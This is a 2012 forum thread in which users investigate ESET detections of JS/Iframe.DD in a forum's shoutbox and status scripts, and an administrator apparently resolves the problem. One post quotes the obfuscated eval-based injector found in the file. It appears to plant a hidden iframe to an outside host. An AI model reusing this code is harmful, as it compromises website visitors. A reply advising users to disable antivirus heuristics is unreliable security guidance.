AlienForce1 Posted May 7, 2012 Share Posted May 7, 2012 Log files -> Detected threats : 5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe. 5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforums.com/public/js/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe. Link to comment Share on other sites More sharing options...
Freddyfre Posted May 7, 2012 Share Posted May 7, 2012 :dunno: nod32 only problems, boh Link to comment Share on other sites More sharing options...
AlienForce1 Posted May 7, 2012 Author Share Posted May 7, 2012 We have to live with it - at least on older computers . At home I prefer to use KIS (if the computer can handle it... :lol: ) Link to comment Share on other sites More sharing options...
rTg Posted May 7, 2012 Share Posted May 7, 2012 jep Kaspersky 2012 did not alert...the .js looks strangei=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c-9c78c64c59c75c63c20c-2c8c7c-2c-9c63c60c64c62c63c75c20c-2c8c7c-2c-9c74c75c80c67c60c20c-2c77c64c74c64c57c64c67c64c75c80c17c63c64c59c59c60c69c18c71c70c74c64c75c64c70c69c17c56c57c74c70c67c76c75c60c18c67c60c61c75c17c7c18c75c70c71c17c7c18c-2c21c19c6c64c61c73c56c68c60c21c-7c0c18c-28c-32c-32c84c-28c-32c-32c61c76c69c58c75c64c70c69c-9c64c61c73c56c68c60c73c-1c0c82c-28c-32c-32c-32c77c56c73c-9c61c-9c20c-9c59c70c58c76c68c60c69c75c5c58c73c60c56c75c60c28c67c60c68c60c69c75c-1c-2c64c61c73c56c68c60c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c74c73c58c-2c3c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c0c18c61c5c74c75c80c67c60c5c77c64c74c64c57c64c67c64c75c80c20c-2c63c64c59c59c60c69c-2c18c61c5c74c75c80c67c60c5c71c70c74c64c75c64c70c69c20c-2c56c57c74c70c67c76c75c60c-2c18c61c5c74c75c80c67c60c5c67c60c61c75c20c-2c7c-2c18c61c5c74c75c80c67c60c5c75c70c71c20c-2c7c-2c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c78c64c59c75c63c-2c3c-2c8c7c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c63c60c64c62c63c75c-2c3c-2c8c7c-2c0c18c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c5c56c71c71c60c69c59c26c63c64c67c59c-1c61c0c18c-28c-32c-32c84'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;549!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+41);}if(v&&e)e(s);looks like obfuscator. It's not normal for IPB3 or? Link to comment Share on other sites More sharing options...
digimon Posted May 7, 2012 Share Posted May 7, 2012 sumbit the file to https://www.virustotal.com/ also double check and make sure your running the latest defientions Link to comment Share on other sites More sharing options...
hakah Posted May 7, 2012 Share Posted May 7, 2012 Same to Eset Smart Security! Link to comment Share on other sites More sharing options...
rudrax Posted May 7, 2012 Share Posted May 7, 2012 false positive Eset :angry: Link to comment Share on other sites More sharing options...
AlienForce1 Posted May 7, 2012 Author Share Posted May 7, 2012 It`s a little strange what VirusTotal finds : 2ips.status.js -> Detection ratio: 2 / 41 ips.status.js -> Detection ratio: 2 / 41 shoutbox.js -> Detection ratio: 2 / 41 Virscan.org didn`t find nothing , all are 0 / 36 : shoutbox.js , ips.status.js , 2ips.status.js On both sites (VirusTotal and Virscan) ESET didn`t report anything ... :unsure: Link to comment Share on other sites More sharing options...
Technology Posted May 7, 2012 Share Posted May 7, 2012 Log files -> Detected threats : 5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe. 5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu...s/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe. According to VB 100, Eset doesn't find false positive. I have been using Eset for quite along time, never experience false positive especially when visiting nsane.down. It possible that the particular page you try to visit or software you try to down might be infected..It also possible that the picture on the nsane forum could be exploit... Try to report this problem to Eset team. And if there is any problem with nsane.down, I quite sure Admin will figure out.. Link to comment Share on other sites More sharing options...
AlienForce1 Posted May 7, 2012 Author Share Posted May 7, 2012 Technology : According to VB 100, Eset doesn't find false positive. Worse part I think that is coming with this : appeared when I accesed my profile (nsane.forums → Viewing Profile: AlienForce1 ) Link to comment Share on other sites More sharing options...
Iznogoud Posted May 7, 2012 Share Posted May 7, 2012 No problems with http://www.nsaneforums.com and Eset Smart Security v5.0.95.0 at me.Everything works ok! Link to comment Share on other sites More sharing options...
Freddyfre Posted May 7, 2012 Share Posted May 7, 2012 this problem only in nsane.forums Link to comment Share on other sites More sharing options...
lyldz Posted May 7, 2012 Share Posted May 7, 2012 ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums.interesting :huh: Link to comment Share on other sites More sharing options...
Guest AmikM1C Posted May 7, 2012 Share Posted May 7, 2012 There is problem with Shoutbox on first page of forum. Not solved in Update 7119 (20120507). It can be mistake in database by ESET because ESS firewall detected today second Comodo DNS like DNS cache poisoning. Link to comment Share on other sites More sharing options...
Administrator Lite Posted May 7, 2012 Administrator Share Posted May 7, 2012 We're looking into this. Link to comment Share on other sites More sharing options...
FreeRyde Posted May 7, 2012 Share Posted May 7, 2012 ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums. interesting :huh:Same here... 'nsane' has never given me any reason for concern. My AV is disabled more often than not anyway. Disable heuristics (guesswork), use the definitions database only. You'll get fewer false positives. Link to comment Share on other sites More sharing options...
Administrator Lite Posted May 7, 2012 Administrator Share Posted May 7, 2012 Can anyone tell me if this problem still exists? Link to comment Share on other sites More sharing options...
jofre Posted May 7, 2012 Share Posted May 7, 2012 Lite : Stopped ! Gone ( 5 minutes ago ) :D... :party: ESS 5.0.95. Thanks ! Link to comment Share on other sites More sharing options...
Technology Posted May 7, 2012 Share Posted May 7, 2012 Can anyone tell me if this problem still exists? Looks fine at my end, perhaps the problem could be in shout box or pictures in the forums...Other then that looks fineee.. :) :showoff: Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.